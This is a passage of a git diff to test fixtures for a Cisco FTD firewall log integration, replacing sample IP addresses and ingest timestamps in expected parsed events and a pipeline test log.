"preserve_original_event" @@ -3339,7 +3339,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.35" ] }, @@ -3350,8 +3350,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994177134Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "ingested": "2021-12-09T13:33:04.305896300Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-11T08:00:30.000Z", @@ -3384,8 +3384,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3414,7 +3414,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3423,8 +3423,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994178930Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:33:04.305901700Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3454,8 +3454,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3484,7 +3484,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3493,8 +3493,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994180767Z", - "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:33:04.305907100Z", + "original": "Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3519,8 +3519,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3560,7 +3560,7 @@ ], "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "host": { @@ -3568,8 +3568,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994182571Z", - "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:33:04.305912500Z", + "original": "Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3601,8 +3601,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3637,7 +3637,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3646,8 +3646,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994184522Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:33:04.305918Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3663,7 +3663,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3681,8 +3681,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3717,7 +3717,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, @@ -3726,8 +3726,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994186306Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:33:04.305923400Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3743,7 +3743,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3761,8 +3761,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3797,7 +3797,7 @@ "127.0.0.1" ], "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3808,8 +3808,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:48.994188130Z", - "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:33:04.305928800Z", + "original": "Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3881,7 +3881,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-07-19T09:06:48.994189927Z", + "ingested": "2021-12-09T13:33:04.305934100Z", "original": "Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3909,8 +3909,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3940,7 +3940,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -3948,8 +3948,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994191735Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305939400Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3973,8 +3973,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4004,7 +4004,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4012,8 +4012,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994193552Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305944700Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4037,8 +4037,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4068,7 +4068,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4076,8 +4076,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994195355Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305950Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4101,8 +4101,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4132,7 +4132,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4140,8 +4140,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994197207Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305955300Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4165,8 +4165,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4196,7 +4196,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4204,8 +4204,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994199043Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305960800Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4229,8 +4229,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4260,7 +4260,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4268,8 +4268,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994200842Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:33:04.305966100Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4332,7 +4332,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994202637Z", + "ingested": "2021-12-09T13:33:04.305971500Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4396,7 +4396,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:48.994204439Z", + "ingested": "2021-12-09T13:33:04.305976800Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4427,8 +4427,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4462,7 +4462,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4471,8 +4471,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994206215Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:33:04.306013300Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4536,7 +4536,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:48.994208006Z", + "ingested": "2021-12-09T13:33:04.306019700Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4599,7 +4599,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994209824Z", + "ingested": "2021-12-09T13:33:04.306025100Z", "original": "Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4628,15 +4628,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, @@ -4674,14 +4674,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994211693Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:33:04.306030500Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4698,8 +4698,8 @@ "ftd": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4712,11 +4712,11 @@ }, "destination": { "nat": { - "ip": "192.0.2.225" + "ip": "192.168.2.225" }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4756,14 +4756,14 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223", - "192.0.2.225" + "192.168.2.223", + "192.168.2.225" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994213531Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:33:04.306039700Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4780,7 +4780,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.225", + "mapped_destination_ip": "192.168.2.225", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4797,9 +4797,9 @@ "nat": { "port": 8080 }, - "address": "192.0.2.223", + "address": "192.168.2.223", "port": 80, - "ip": "192.0.2.223" + "ip": "192.168.2.223" }, "source": { "nat": { @@ -4839,13 +4839,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994215355Z", - "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:33:04.306045100Z", + "original": "Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4863,7 +4863,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4877,8 +4877,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4903,13 +4903,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994217158Z", - "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:33:04.306050700Z", + "original": "Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4931,8 +4931,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4959,13 +4959,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994218952Z", - "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:33:04.306056Z", + "original": "Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4987,8 +4987,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -5021,13 +5021,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994220795Z", - "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:33:04.306061300Z", + "original": "Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log index c81a41dfb1f..c460849f58e 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-connection.log @@ -1,10 +1,10 @@ 2019-08-15T16:03:31Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 98, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity 2019-08-15T16:05:33Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.100.30, DstIP: 10.0.1.20, ICMPType: Echo Request, ICMPCode: No Code, Protocol: icmp, IngressInterface: output, EgressInterface: input, IngressZone: output-zone, EgressZone: input-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: ICMP client, ApplicationProtocol: ICMP, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 98, NAPPolicy: Balanced Security and Connectivity -2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address -2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 8.8.8.8, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395 -2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity -2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 52.59.244.233, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, ConnectionDuration: 1, InitiatorPackets: 1359, ResponderPackets: 29001, InitiatorBytes: 97454, ResponderBytes: 41319018, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: eu-central-1.ec2.archive.ubuntu.com, URL: http://eu-central-1.ec2.archive.ubuntu.com/ubuntu/pool/main/m/manpages/manpages-dev_4.15-1_all.deb -2019-08-16T09:33:15Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity -2019-08-16T09:33:15Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46000, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: curl/7.58.0, Client: cURL, ClientVersion: 7.58.0, ApplicationProtocol: HTTP, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 503, ResponderBytes: 690, NAPPolicy: Balanced Security and Connectivity, HTTPResponse: 200, ReferencedHost: www.eicar.org, URL: http://www.eicar.org/download/eicar_com.zip +2019-08-15T16:05:37Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 50074, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, InitiatorPackets: 1, ResponderPackets: 0, InitiatorBytes: 106, ResponderBytes: 0, NAPPolicy: Balanced Security and Connectivity, DNSQuery: eu-central-1.ec2.archive.ubuntu.com, DNSRecordType: a host address +2019-08-15T16:07:00Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 49264, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 2, ResponderPackets: 2, InitiatorBytes: 164, ResponderBytes: 314, NAPPolicy: Balanced Security and Connectivity, DNSQuery: siem-inside, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 86395 +2019-08-15T16:07:18Z firepower %FTD-1-430002: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, InitiatorPackets: 2, ResponderPackets: 1, InitiatorBytes: 140, ResponderBytes: 74, NAPPolicy: Balanced Security and Connectivity +2019-08-15T16:07:19Z firepower %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 43228, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Rule-1, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, UserAgent: Debian APT-HTTP/1.3 (1.6.11), Client: Advanced Packaging Tool, ClientVersion: 1.3, ApplicationProtocol: HTTP, WebApplication: Ubuntu, 